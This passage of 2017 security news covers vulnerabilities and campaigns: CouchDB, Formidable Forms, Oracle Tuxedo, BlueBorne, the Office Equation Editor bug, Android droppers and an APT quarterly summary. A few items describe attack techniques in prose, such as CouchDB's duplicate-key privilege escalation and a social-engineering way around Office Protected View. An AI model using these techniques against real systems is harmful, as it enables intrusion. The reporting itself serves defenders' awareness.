“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive. Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.

Critical Vulnerabilities Patched in Apache CouchDB
16.11.2017 securityweek
An update released last week for Apache CouchDB patched critical vulnerabilities that could have been exploited by malicious actors for privilege escalation and code execution on a significant number of installations.

CouchDB is a document-oriented open source database management system and it’s currently the 28th most popular out of the more than 300 systems tracked by DB-Engines. One of the projects using CouchDB is npm, a package manager for JavaScript and the world's largest software registry.

Researcher Max Justicz discovered a CouchDB vulnerability while looking for bugs on the server responsible for distributing npm packages, registry.npmjs.org. The registry serves nearly 3.5 billion package downloads every week, according to the npm website.

The flaw identified by Justicz, tracked as CVE-2017-12635, could have been exploited by an attacker with non-admin privileges to obtain administrator rights and ultimately execute arbitrary code.

“Due to differences in CouchDB’s Erlang-based JSON parser and JavaScript-based JSON parser, it is possible to submit _users documents with duplicate keys for `roles` used for access control within the database, including the special case `_admin` role, that denotes administrative users,” CouchDB developers said in an advisory.

In the case of the npm registry, Justicz believes that exploitation of the vulnerability could have allowed an attacker to modify packages served to users. However, the researcher did not attempt to exploit the vulnerability against npm’s production servers.

While analyzing CVE-2017-12635, a member of the CouchDB security team discovered CVE-2017-12636, a flaw that could have been exploited in combination with the privilege escalation bug to execute arbitrary shell commands on the server.

“CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows a CouchDB admin user to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet,” CouchDB’s advisory explains.

The vulnerabilities were patched last week with the release of versions 2.1.1 and 1.7.0/1.7.1, and CouchDB developers believe all users have already installed the updates. The details of the flaws were made public only a week after the release of the updates to give users time to apply the patches.

APT Trends report Q3 2017
16.11.2017 Kaspersky Analysis  APT
Beginning in the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.

As stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: intelreports@kaspersky.com.

Chinese-Speaking Actors
The third quarter demonstrated to us that Chinese-speaking actors have not “disappeared” and are still very much active, conducting espionage against a wide range of countries and industry verticals. In total, 10 of the 24 reports produced centered around activity attributed to multiple actors in this region.

The most interesting of these reports focused on two specific supply chain attacks; Netsarang / ShadowPad and CCleaner. In July 2017, we discovered a previously unknown malware framework (ShadowPad) embedded inside the installation packages hosted on the Netsarang distribution site. Netsarang is a popular server management software used throughout the world. The ShadowPad framework contained a remotely activated backdoor which could be triggered by the threat actor through a specific value in a DNS TXT record. Others in the research community have loosely attributed this attack to the threat actor Microsoft refers to as BARIUM. Following up on this supply chain attack, another was reported initially by Cisco Talos in September involving CCleaner, a popular cleaner / optimization tool for PCs. The actors responsible signed the malicious installation packages with a legitimate Piriform code signing certificate and pushed the malware between August and September.

Q3 also showed China is very interested in policies and negotiations involving Russia with other countries. We reported on two separate campaigns demonstrating this interest. To date, we have observed three separate incidents where Russia and another country hold talks and are targeted shortly thereafter, IndigoZebra being the first. IronHusky was a campaign we first discovered in July targeting Russian and Mongolian government, aviation companies, and research institutes. Earlier in April, both conducted talks related to modernizing the Mongolian air defenses with Russia’s help. Shortly after these talks, the two countries were targeted with a Poison Ivy variant from a Chinese-speaking threat actor. In June, India and Russia signed a much awaited agreement to expand a nuclear power plant in India, as well as further define the defense cooperation between the two countries. Very soon after, both countries energy sector were targeted with a new piece of malware we refer to as “H2ODecomposition”. In some case this malware was masquerading as a popular Indian antivirus solution (QuickHeal). The name of the malware was derived from an initial RC5 string used in the encryption process (2H2O=2H2+O2) which describes a chemical reaction used in hydrogen fuel cells.

Other reports published in the third quarter under chinese-speaking actors were mainly updates to TTPs by known adversaries such as Spring Dragon, Ocean Lotus, Blue Termite, and Bald Knight. The Spring Dragon report summarized the evolution of their malware to date. Ocean Lotus was observed conducting watering hole attacks on the ASEAN website (as done previously) but with a new toolkit. A new testing version of Emdivi was discovered in use by Blue Termite as well as their testing of CVE-2017-0199 for use. Finally, Bald Knight (AKA – Tick) was seen using their popular XXMM malware family to target Japan and South Korea.

Below is a summary of report titles produced for the Chinese region. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to intelreports@kaspersky.com.

Analysis and evolution of Spring Dragon tools
EnergyMobster – Campaign targeting Russian-Indian energy project
IronHusky – Intelligence of Russian-Mongolian military negotiations
The Bald Knight Rises
Massive watering holes campaign targeting Asia-Pacific
Massive Watering Holes Campaign Targeting AsiaPacific – The Toolset
NetSarang software backdoored in supply chain attack – early warning
ShadowPad – popular server management software hit in supply chain attack
New BlueTermite samples and potential new wave of attacks
CCleaner backdoored – more supply chain attacks
Russian-Speaking Actors
The third quarter was a bit slower with respect to Russian speaking threat actors. We produced four total reports, two of which focused on ATM malware, one on financial targeting in Ukraine and Russia, and finally a sort of wrap-up of Sofacy activity over the summer.

The ATM related reports centered around Russian speaking actors using two previously unknown pieces of malware designed specifically for certain models. “Cutlet Maker” and “ATMProxy” both ultimately allowed the users to dispense cash at will from a chosen cartridge within the ATMs. ATMProxy was interesting since it would sit dormant on an ATM until a card with a specific hard coded number was inserted, at which point it would dispense more cash than what was requested.

Another report discussed a new technique utilizing highly targeted watering holes to target financial entities in Ukraine and Russia with Buhtrap. Buhtrap has been around since at least 2014, but this new wave of attacks was leveraging search engine optimization (SEO) to float malicious watering hole sites to the top of search results, thus providing more of a chance for valid targets to visit the malicious sites.

Finally, we produced a summary report on Sofacy’s summertime activity. Nothing here was groundbreaking, but rather showed the group remained active with their payloads of choice; SPLM, GAMEFISH, and XTUNNEL. Targeting also remained the same, focusing on European defense entities, Turkey, and former republics.

Below is a list of report titles for reference:

ATMProxy – A new way to rob ATMs
Cutlet maker – Newly identified ATM malware families sold on Darknet
Summertime Sofacy – July 2017
Buhtrap – New wave of attacks on financial targets
English-Speaking Actors
The last quarter also had us reporting on yet another member of the Lamberts family. Red Lambert was discovered during our previous analysis of Grey Lambert and utilized hard coded SSL certificates in its command and control communications. What was most interesting about the Red Lambert is that we discovered a possible operational security (OPSEC) failure on the actor’s part, leading us to a specific company who may have been responsible, in whole or in part, for the development of this Lambert malware.

The Red Lambert
Korean-Speaking Actors
We were also able to produce two reports on Korean speaking actors, specifically involving Scarcruft and Bluenoroff. Scarcruft was seen targeting high profile, political entities in South Korea using both destructive malware as well as malware designed more for espionage. Bluenoroff, the financially motivated arm of Lazarus, targeted a Costa Rican casino using Manuscrypt. Interestingly enough, this casino was compromised by Bluenoroff six months prior as well, indicating they potentially lost access and were attempting to get back in.

Report titles focusing on Korean-speaking actors:

Scent of ScarCruft
Bluenoroff hit Casino with Manuscrypt
Other Activity
Finally, we also wrote seven other reports on “uncategorized” actors in the third quarter. Without going into detail on each of these reports, we will focus on two. The first being a report on the Shadowbrokers’ June 2017 malware dump. An anonymous “customer” who paid to get access to the dump of files posted the hashes of the files for the month, mainly due to their displeasure in what was provided for the money. We were only able to verify one of nine file hashes, which ended up being an already known version of Triple Fantasy.

The other report we’d like to highlight (“Pisco Gone Sour”) is one involving an unknown actor targeting Chilean critical institutions with Veil , Meterpreter, and Powershell Empire. We are constantly searching for new adversaries in our daily routine and this appears to be just that. The use of publicly available tools makes it difficult to attribute this activity to a specific group, but our current assessment based on targeting is that the actor may be based somewhere in South America.

Dark Cyrene – politically motivated campaign in the Middle East
Pisco Gone Sour – Cyber Espionage Campaign Targeting Chile
Crystal Finance Millennium website used to launch a new wave of attacks in Ukraine
New Machete activity – August 2017
Shadowbroker June 2017 Pack
The Silence – new trojan attacking financial organizations
Final Thoughts
Normally we would end this report with some predictions for the next quarter, but as it will be the end of the year soon, we will be doing a separate predictions report for 2018. Instead, we would like to point out one alarming trend we’ve observed over the last two quarters which is an increase in supply chain attacks. Since Q2, there have been at least five incidents where actors have targeted the supply chain to accomplish their goals instead of going directly after the end target; MeDoc, Netsarang, CCleaner, Crystal Finance, and Elmedia. While these incidents were not the result of just one group, it does show how the attention of many of the actors out there may be shifting in a direction that could be much more dangerous. Successfully compromising the supply chain provides easy access to a much wider target base than available through traditional means such as spear phishing. As an added benefit, these attacks can remain undetected for months, if not longer. It remains to be seen if this trend will continue into 2018, but given the successes from the five mentioned above, we feel we haven’t seen the last of this type of attack in the near future.

WordPress Sites Exposed to Attacks by 'Formidable Forms' Flaws
16.11.2017 securityweek
Vulnerabilities found by a researcher in a popular WordPress plugin can be exploited by malicious actors to gain access to sensitive data and take control of affected websites.

Formidable Forms, available both for free and as a paid version that provides additional features, is a plugin that allows users to easily create contact pages, polls and surveys, and other types of forms. The plugin has more than 200,000 active installations.

Jouko Pynnönen of Finland-based company Klikki Oy has analyzed the plugin and discovered several vulnerabilities, including ones that introduce serious security risks for the websites using it.

The flaw with the highest severity is a blind SQL injection that can allow attackers to enumerate a website’s databases and obtain their content. Exposed data includes WordPress user credentials and data submitted to a website via Formidable forms.

The researcher also found another flaw that exposes data submitted via Formidable forms. Both this and the SQL injection bug are related to Formidable’s implementation of shortcodes, WordPress-specific code that allows users to add various types of content to their sites with very little effort.

Pynnonen also discovered reflected and stored cross-site scripting (XSS) vulnerabilities. The stored XSS allows an attacker to execute arbitrary JavaScript code in the context of an administrator’s browsing session – the attacker injects the malicious code via forms and it gets executed when viewed by the site admin in the WordPress dashboard.

The expert also noticed that if the iThemes Sync WordPress maintenance plugin is present alongside Formidable Forms, an attacker can exploit the aforementioned SQL injection flaw to obtain a user’s ID and authentication key. This information can be used to control WordPress via iThemes Sync, including to add new admins or install plugins.

Formidable Forms addressed the vulnerabilities with the release of versions 2.05.02 and 2.05.03. iThemes Sync does not view the attack vector described by the researcher as a vulnerability so it has decided not to release a patch.

Pynnonen identified these flaws after being invited to take part in a HackerOne-hosted bug bounty program that offers rewards of up to $10,000. The program was run by an unnamed Singapore-based tech company, but the Formidable Forms vulnerabilities qualified for a bounty due to the fact that the plugin had been used by the firm. Exploitation of the flaws on the tech firm’s website could have allowed an attacker to gain access to personal information and other sensitive data.

The researcher earned $4,500 for the SQL injection vulnerability and a few hundred dollars for each of the other security holes. However, he is displeased that the Singaporean company downplayed the risks posed by the flaws and downgraded the severity of the SQL injection bug from “critical” to “high.”

Pynnonen previously identified serious vulnerabilities in Yahoo Mail, WordPress plugins and the WordPress core.

Oracle Patches Critical Flaws in Jolt Server for Tuxedo
16.11.2017 securityweek
Oracle informed customers on Tuesday that it has patched several vulnerabilities, including ones rated critical and high severity, in the Jolt Server component of Oracle Tuxedo.

Oracle Tuxedo, a key component of Oracle Fusion Middleware, is an application server that helps users build and deploy enterprise applications developed in non-Java programming languages. Jolt provides a Java-based interface that extends the functionality of Tuxedo applications so that they can be accessed over the Internet or intranet using a web browser.

According to Oracle, a total of five vulnerabilities have been found in the Jolt Server component – the Jolt client is not impacted. The security holes affect Tuxedo versions 11.1.1, 12.1.1, 12.1.3 and 12.2.2.

The most serious of the flaws, with a CVSS score of 10, is CVE-2017-10269, which allows an unauthenticated attacker with access to the network to easily take control of Tuxedo.

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Tuxedo accessible data as well as unauthorized access to critical data or complete access to all Oracle Tuxedo accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Tuxedo,” Oracle said.

Another critical vulnerability in Jolt Server is CVE-2017-10272. The flaw has a CVSS score of 9.9 and its impact is similar to the one of CVE-2017-10269. However, in order to exploit it, an attacker needs to have access to at least a low privileged account.

The company pointed out that these vulnerabilities may have significant impact on other products as well, not just Tuxedo. For example, Oracle PeopleSoft products also use Tuxedo, which means PeopleSoft customers are required to apply the patches as well.

The updates released by Oracle also resolve a high severity vulnerability that allows an unauthenticated attacker to gain access to critical data (CVE-2017-10267). Another high severity flaw, tracked as CVE-2017-10278, allows access to critical data as well, but it can also be exploited to modify data and cause a partial DoS condition in Tuxedo. On the other hand, the vendor said CVE-2017-10278 is difficult to exploit.

The last vulnerability, CVE-2017-10266, has been classified as medium severity as it only gives access to a subset of Tuxedo data.

“Oracle strongly recommends affected Oracle Customers apply this Security Alert as soon as possible,” said Eric Maurice, director of security assurance at Oracle.

This is the second round of security patches released by Oracle since the company’s October Critical Patch Update (CPU). In late October, the company informed customers of an out-of-band update that fixed a critical vulnerability in Identity Manager, which is also part of the Fusion Middleware offering.

Investment Firm Combines Smarsh and Actiance to Solve FinServ Compliance Issues
16.11.2017 securityweek Safety
Two major financial services and regulated industry compliance firms, Smarsh and Actiance, have combined to better serve industry's increasingly complex requirements around communications, archiving and discovery regulations. Actiance has been acquired by K1 Investment Management, and combined with Smarsh.

"The Financial Services sector is undergoing rapid change," explains Neil Malik, Managing Partner at K1; "legacy technologies are no longer sufficient to comply with SEC and FINRA standards, let alone MiFID II. This combination of capabilities from Actiance and Smarsh provides the industry with a means to get ahead -- and stay ahead -- of compliance trends, while introducing the latest communications technologies to increase efficiency and effectiveness in the modern enterprise."

Smarsh provides cloud-based archiving and compliance solutions for companies in regulated and litigious industries. It provides a unified compliance and e-discovery workflow across a range of digital communications systems, including emails, public and enterprise social media, websites, and instant and mobile messaging. Actiance is a major provider of communications compliance, archiving, and analytics -- providing compliance across a broad set of communications channels with insights on what's being captured.

Before the acquisition, the two firms could be considered competitors, and there is overlap in their solutions. Together, however, they provide a more complete compliance service from a single provider. "Together, Actiance and Smarsh uniquely enable global customers across industries to capture, record, store, and analyze over 100 content types," said Kailash Ambwani, CEO of Actiance. "Together we will enhance our combined sales and distribution capabilities, offer our customers additional resources and services, and accelerate our product development."

"Perhaps most importantly," added Stephen Marsh, founder, chairman and CEO of Smarsh, "organizations with legacy, on-premise capture and archiving solutions can make the overdue transition to upgraded and more modern solutions. All of this is now possible through a single provider."

Compliance is an increasingly important part of the risk management portfolio. New regulations are affecting all industries; but none more so than financial services. Coupled with the growth of regulations is an increasingly active regulator. The annual Eversheds Sutherland analysis of Financial Industry Regulatory Authority (FINRA) cases shows that FINRA fines on FinServ firms increased by around 435% in 2016.

Two particular areas of FINRA activity are relevant to the newly combined suppliers: 'books and records' actions, and actions against compliance officers. Books and records fines increased by 423%, "driven largely by enforcement actions against 12 firms for, among other things, failing to preserve records in "write once, read many" (WORM) format. FINRA fined these firms a total of $14.4 million."

FINRA also cracked down on individual compliance officers. In one case, a firm's former compliance officer was fined $25,000 and suspended for three months. Eversheds Sutherland (US) partner Brian Rubin commented, "These cases are a signal to compliance officers that they are in FINRA's crosshairs. They ought to take heed and try to ensure that adequate compliance-related policies and procedures are in place."

Few details of the new Smarsh/Actiance arrangement have been made public. It is not described as a merger, and there is no current indication of a new name for the combined firms. The statement merely says, "Together, the combined company offers deployment options (cloud, dedicated, on-premise, and hybrid) to meet the needs of its customers... It will continue to support both company's product lines while providing customers greater value and flexibility. Near-term priorities include more investment in product capabilities, increased flexibility in deployment options, accelerated expansion in Europe and development of a joint channel partner program."

Existing operations of both Smarsh and Actiance will be maintained in Oregon, California, New York, Massachusetts, Georgia, North Carolina, Canada, India, and the United Kingdom. Terms of the deal were not disclosed.

In September, K1 Investment Management acquired SecureAuth for $225 million, with plans to merge it with Core Security, a firm focused on vulnerability discovery, identity governance, and threat management. K1 had previously acquired Damballa in a deal reported to be under $10 million.

Multi-Stage Android Malware Evades Google Play Detection
16.11.2017 securityweek Android
A newly discovered multi-stage Android malware that managed to sneak into Google Play is using advanced anti-detection features, ESET security researchers reveal.

Eight malicious applications hiding the new threat were found in the official application store, all legitimate-looking but delaying the malicious activity to hide their true intent. Google has removed all eight programs after being alerted of the threat.

Detected as Android/TrojanDropper.Agent.BKY, the applications form a new family of multi-stage Android malware, ESET says. Although the most popular of these apps reached only several hundred downloads, the use of advanced anti-detection features makes this malware family interesting.

All samples of the mobile Trojan employ a multi-stage architecture and make use of encryption to stay under the radar, the security researchers say. The applications managed to keep their malicious intent hidden by not requesting suspicious permissions after installation and by mimicking the activity they were supposed to exhibit.

However, the apps also decrypt and execute a first-stage payload designed to decrypt and execute the second-stage payload from the assets of the app downloaded from Google Play. These steps, however, are not visible to the user but serve as obfuscatory measures, ESET says.

The second-stage payload downloads a malicious app from a hardcoded URL without the victim’s knowledge. After a delay of around 5 minutes, however, the victim is prompted to install this third-stage payload.

This application masquerades as Adobe Flash Player or another popular app. To appear legitimate to the user, the app uses a name such as Android Update or Adobe Update to trick the user into allowing it to execute and into granting the necessary permissions for the payload to perform nefarious actions.

Once installed and with the requested permissions granted, the app decrypts and executes a final, fourth-stage payload. According to ESET, this payload was a mobile banking Trojan in all analyzed cases.

The Trojan was designed to present the victim with fake login forms to steal their credentials or credit card details.

Because one of the malicious apps downloads the final payload using the bit.ly URL shortener, the security researchers discovered that the link had been used almost 3000 times as of November 14, and that most of the hits came from the Netherlands.

Two of most recent samples of this malware downloader were observed dropping either the notorious MazarBot banking Trojan or spyware. According to ESET, the downloader’s nature allows its operators to deliver any payload through it, “as long as it doesn’t get flagged by the Google Protect mechanism.”

Impacted users are advised to first deactivate the admin rights for the installed payload, and then uninstall the surreptitiously-installed apps, along with the application initially downloaded from the Play Store.

Users should head to Settings > (General) > Security > Device administrators and deactivate the admin rights that Adobe Flash Player, Adobe Update, or Android Update might have. The installed payload can be removed from the Application manager.

The nefarious apps involved in this malicious campaign include MEX Tools, Clear Android, Cleaner for Android, World News, WORLD NEWS, World News PRO, Игровые Автоматы Слоты Онлайн, and Слоты Онлайн Клуб Игровые Автоматы.

“Unfortunately, multi-stage downloaders, with their improved obfuscation features, have a better chance of sneaking into official app stores than common Android malware does. Users who want to stay protected should not rely fully on the stores’ protections; instead, it’s crucial for users to check app ratings and comments, pay attention to what permissions they grant to apps, and run a quality security solution on their mobile devices,” ESET concludes.

UK Cyber Security Chief Blames Russia for Hacker Attacks
16.11.2017 securityweek BigBrothers
Russia has launched cyber attacks on the UK media, telecoms and energy sectors in the past year, Britain's cyber security chief said Wednesday amid reports of Russian interference in the Brexit referendum.

"Russia is seeking to undermine the international system. That much is clear," Ciaran Martin, head of Britain's National Cyber Security Centre (NCSC) said at a London tech conference, according to his office.

"Russian interference, seen by the NCSC over the past year, has included attacks on the UK media, telecommunications and energy sectors," Martin said.

The centre has coordinated the government's response to 590 significant incidents since its launch in 2016, although the government agency has not detailed which were linked to Russia.

Prime Minister Theresa May on Monday accused Moscow of "seeking to weaponise information" and "sow discord in the West and undermine our institutions".

Russia's cyber activities include "deploying its state-run media organisations to plant fake stories and photo-shopped images", she said in a speech.

The scathing criticism was rejected by Russia's foreign ministry, which accused May of trying to distract the British public from problems at home.

Moscow's alleged attempts to influence last year's referendum on Britain's membership of the European Union are part of investigations under way in London.

May told lawmakers on Wednesday that parliament's intelligence and security committee would be looking into Russian interference.

Meanwhile parliament's digital, culture, media and sport committee has requested data from Twitter and Facebook on Russia-linked accounts and aims to interview social media executives at the British embassy in Washington early next year.

- Pro-Brexit 'bots' -

Damian Collins, the committee chairman, said it was "beyond doubt" that Russia has interfered in UK politics.

He said there was a pattern of behaviour of Russian organisations seeking out opportunities to create division, unrest and instability in the West.

"Foreign organisations have the ability to manipulate social media platforms to target voters abroad," he told AFP.

"This is seriously-organised buildings of hundreds of people engaged in propagating every day fake news through social media."

He said it was "terrifying" how cheap and easy it was for them to reach millions of people.

"It is one of the biggest threats our democracies face and we have to be serious about combatting it," Collins added.

May's spokesman insisted: "There has been no evidence of successful interference in our electoral processes."

Researchers at the University of Edinburgh, who examined 2,752 accounts suspended by Twitter in the United States, found 419 were operating from the Russian Internet Research Agency and attempting to influence British politics, The Guardian reported.

Professor Laura Cram, the university's neuropolitics research director, told the newspaper they tweeted about Brexit 3,468 times -- mostly after the June 23 referendum.

The content overall was "quite chaotic and it seems to be aimed at wider disruption. There's not an absolutely clear thrust. We pick up a lot on refugees and immigration", she said.

Meanwhile researchers at Swansea University in Wales and the University of California, Berkeley, have found more than 150,000 Russian-based Twitter accounts which may have influenced the Brexit referendum.

The social media accounts switched their attention to EU membership in the run-up to the referendum, 2016, according to research outlined in The Times newspaper.

Many of the accounts were fully-automated "bot" profiles which posted hundreds of tweets daily, or "cyborg" accounts which were partially run by people, the newspaper said.

The majority of the posts were pro-Brexit, while some supported remaining in the European Union.

Meanwhile it was revealed that a tweet which caused a furore after the Westminster terror attack in March originally came from a trolling agency account which, according to evidence before the US Congress, is backed by the Russian government.

The tweet showing a picture of a woman in a headscarf walking next to a victim, with the words: "Muslim woman pays no mind to the terror attack, casually walks by a dying man while checking phone".

Amazon Echo, Google Home Vulnerable to BlueBorne Attacks
16.11.2017 securityweek
Amazon Echo and Google Home devices are vulnerable to attacks exploiting a series of recently disclosed Bluetooth flaws dubbed “BlueBorne.”

IoT security firm Armis reported in September that billions of Android, iOS, Windows and Linux devices using Bluetooth had been exposed to a new attack that can be carried out remotely without any user interaction.

A total of eight Bluetooth implementation vulnerabilities allow a hacker who is in range of the targeted device to execute arbitrary code, obtain sensitive information, and launch man-in-the-middle (MitM) attacks. There is no need for the victim to click on a link or open the file in order to trigger the exploit, and most security products would likely not detect an attack.

Google patched the vulnerabilities affecting Android in September and Microsoft released fixes for Windows in July. Apple had already addressed the issue in iOS one year prior to disclosure, and Linux distributions released updates shortly after disclosure.

However, Armis has now revealed that the voice-activated personal assistants Google Home and Amazon Echo are also vulnerable to attacks leveraging the BlueBorne flaws.

Echo is affected by a remote code execution vulnerability in the Linux kernel (CVE-2017-1000251) and an information disclosure bug in the SDP server (CVE-2017-1000250). Google Home is exposed to attacks by an information leakage issue affecting Android’s Bluetooth implementation (CVE-2017-0785). This Android flaw can also be exploited to cause a denial-of-service (DoS) condition.

Since the Bluetooth feature cannot be disabled on either of the devices, attackers can easily launch an attack as long as they are in range. Armis has published a video showing how an Amazon Echo device can be hacked and manipulated by a remote attacker:

The security firm pointed out that this is the first remote attack demonstrated against Echo. An attack method was previously described by MWR, but it required physical access to the device.

Amazon Echo and Google Home represent 99 percent of the U.S. market for voice-controlled personal assistants, with 15 million and 5 million units sold, respectively. This normally indicates a significant number of potential victims, including many enterprises that use these products. However, Armis has notified Google and Amazon of the vulnerabilities and both companies released patches that have likely reached a majority of devices via automatic updates.

“The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated,” Armis researchers said. “However, even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates - potentially leaving them susceptible to attacks indefinitely.”

Armis has released an Android app that is designed to help users identify vulnerable devices.

Microsoft Patches 17 Year-Old Vulnerability in Office
16.11.2017 securityweek
Microsoft on Tuesday released its November 2017 security updates to resolve 53 vulnerabilities across products, including a security bug that has impacted all versions of its Microsoft Office suite over the past 17 years.

Tracked as CVE-2017-11882, the vulnerability resides in the Microsoft Equation Editor (EQNEDT32.EXE), a tool that provides users with the ability to insert and edit mathematical equations inside Office documents.

The bug was discovered by Embedi security researchers as part of very old code in Microsoft Office. The vulnerable version of EQNEDT32.EXE was compiled on November 9, 2000, “without essential protective measures,” the researchers say.

Although the component was replaced in Office 2007 with new methods of displaying and editing equations, Microsoft kept the vulnerable file up and running in the suite, most likely to ensure compatibility with older documents.

“The component is an OutPorc COM server executed in a separate address space. This means that security mechanisms and policies of the Office processes do not affect exploitation of the vulnerability in any way, which provides an attacker with a wide array of possibilities,” Embedi notes in a research paper (PDF).

EQNEDT32.EXE, the researchers explain, employs a set of standard COM interfaces for Object Linking and Embedding (OLE), an Office feature already known to be abused by cybercriminals.

The researchers discovered they could cause a buffer overflow using a procedure calling a function designed to “copy null-term lines from an internal form to buffer which was sent to it as the first argument.” The bug, the researchers say, can be exploited to achieve arbitrary code execution.

According to Embedi, the use of several OLEs designed to exploit the vulnerability could lead to the execution of an arbitrary sequence of commands, such as downloading a file from the Internet and executing it.

The security researchers claim that they managed to create an exploit that would work with all Office versions released over the past 17 years, including Office 365, and which would impact all Windows versions, including Windows 10 Creators Update. Furthermore, the exploit would work on all architectures.

The most worrying aspect of the vulnerability is that the exploit doesn’t require user interaction for it to work, once the malicious document carrying the code is opened. In fact, the attack would not even interrupt a user’s work with Microsoft Office, the researchers claim.

“The only hindrance here is the protected view mode because it forbids active content execution (OLE/ActiveX/Macro). To bypass it cyber criminals use social engineering techniques. For example, they can ask a user to save a file to the Cloud (OneDrive, GoogleDrive, etc.). In this case, a file obtained from remote sources will not be marked with the MOTW (Mark of The Web) and, when a file is opened, the protected view mode will not be enabled,” Embedi notes.

This vulnerability, the researchers conclude, proves that EQNEDT32.EXE is an obsolete component that may contain other security weaknesses, possibly easily exploitable. Had standard security mitigation been used when compiling the file, the vulnerability wouldn’t be exploitable, the researchers say.

The vulnerability was reported to Microsoft in April 2017. The software giant addressed it this week, as part of its November 2017 Patch Tuesday.

Fileless Attacks Ten Times More Likely to Succeed: Report
16.11.2017 securityweek
A new report from the Ponemon Institute confirms, but quantifies, what most people know: protecting endpoints is becoming more difficult, more complex and more time-consuming -- but not necessarily more successful.

Commissioned by endpoint protection firm Barkly, the report (PDF) confirms that defenders are increasingly moving away from primarily signature-based malware detection by replacing or supplementing existing defenses with additional protection or response capabilities. One third of respondents have replaced their existing AV product, while half of the respondents have retained their existing product but supplemented them with additional protections.

To combat both old and new defenses, attackers are responding with a new attack methodology -- the fileless attack. Ponemon notes that 29% of attacks in 2017 have been fileless. This is up from 20% in 2016, and is expected to increase to 35% in 2018.

The fileless attack does not install detectable files. These attacks, says Ponemon, "instead leverage exploits designed to run malicious code or launch scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind. Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network."

According to Ponemon, 54% of companies have experienced one or more successful attacks that have compromised data and/or infrastructure, while 77% of those attacks used exploits or fileless attacks. While the attack methodology has changed, the ultimate goal of the attacker has not. Ransomware, for example, remains a major problem. Half of the surveyed organizations have suffered a ransomware incident in 2017, while 40% of those have experienced multiple incidents. The average ransomware demand is now $3,675.

The implication from these figures is that bad guys can adapt to new security faster than good guys can adapt to new attacks. Barkly's CTO Jack Danahy doesn't believe that this is inevitable. "For us," he told SecurityWeek, "the problem is behavioral." Since the bad guys will always get better at obfuscating what they are doing, plus the reality that they have equal access to the technologies that the good guys use, "you know that they are going to look for ways to get around the entire class of defense."

Fileless attacks are the bad guys' response to traditional machine learning. When you look at the two bodies of technology, the older and the newer endpoint protection products, there's a common factor -- they are all file-based. They both still need a file to look at. This is what led to the development of fileless attacks. "We knew right from the beginning that we had to concentrate on stopping attacks because of their behavior, not because of any malware files they use. We had to find a way," he explained, "to identify really low-level, really early behaviors that are representative of when malware is trying to set itself up, before it can do any corrupting activity."

To do this, Barkly developed a system that would examine both good behaviors and bad behaviors, and to be able to 'disambiguate' the two. "This is opposed to the standard method of looking for changes that have already happened or specific attributes of existing files in order to know that something bad is happening. That's too late," he said.

The end result is a SaaS product that updates its ability to differentiate between good and bad behavior on a daily basis -- using Barkly's own 'responsive machine-learning' (a combination of both supervised and unsupervised machine learning). "It's like a factory of bad behaviors and a factory of good behaviors, with machine learning to disambiguate the two," he said.

Users do not have a high opinion of most existing endpoint products, notes the Ponemon report. The average organization has seven different software agents on its endpoints to manage security, making it 'noisy and time-consuming'. Perhaps because of the growing number of products, 73% of organizations say it is getting more difficult to manage endpoint security, and two-thirds do not have the resources to do so adequately.

The biggest problem with most current solutions, according to the Ponemon study, is that they do not provide adequate protection. Danahy is not surprised. "You cannot claim to do endpoint protection unless you can stop both file-based and fileless attacks before they get through and harm the client. A fileless attack is ten times more likely to succeed than a file-based attack."

According to the study, the total cost of a successful attack is now over $5 million. The 'cost of a breach' is a contentious subject because of the variables concerned. Ponemon is known to take great care over its conclusions, but Danahy agrees it's a difficult concept. "That's why," he told SecurityWeek, "I insisted on the 'average cost per employee' being included." This figure stands at $301. It makes it easier for smaller firms to realistically consider the likely cost to themselves.

Ponemon's conclusion from the study is that organizations would "benefit from endpoint security solutions designed to block new threats like fileless attacks, which are responsible for the majority of today's endpoint compromises. To restore their faith in endpoint security's effectiveness, new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management."

Windows 10 Detects Reflective DLL Loading: Microsoft
16.11.2017 securityweek Safety
Windows 10 Creators Update can detect reflective Dynamic-Link Library (DLL) loading in a variety of high-risk processes, including browsers and productivity software, Microsoft says.

This is possible because of function calls (VirtualAlloc and VirtualProtect) related to procuring executable memory, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP).

Reflective DLL loading, the software giant explains, relies on loading a DLL into a process memory without using the Windows loader. First described in 2008, the method allows for the loading of a DLL into a process even if the DLL isn’t registered with the process.

The technique is employed by modern attacks to avoid detection, although the operation is not trivial, as it requires the use of a custom loader that can write the DLL into memory and then resolve its imports and/or its relocation.

What motivates attackers to use the method, Microsoft says, is that reflectively loading a DLL doesn’t require the DLL to reside on disk, and the library that is loaded may not be readily visible without forensic analysis, especially because it is not written to disk.

“A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading,” Christian Seifert, Windows Defender ATP Research, explains.

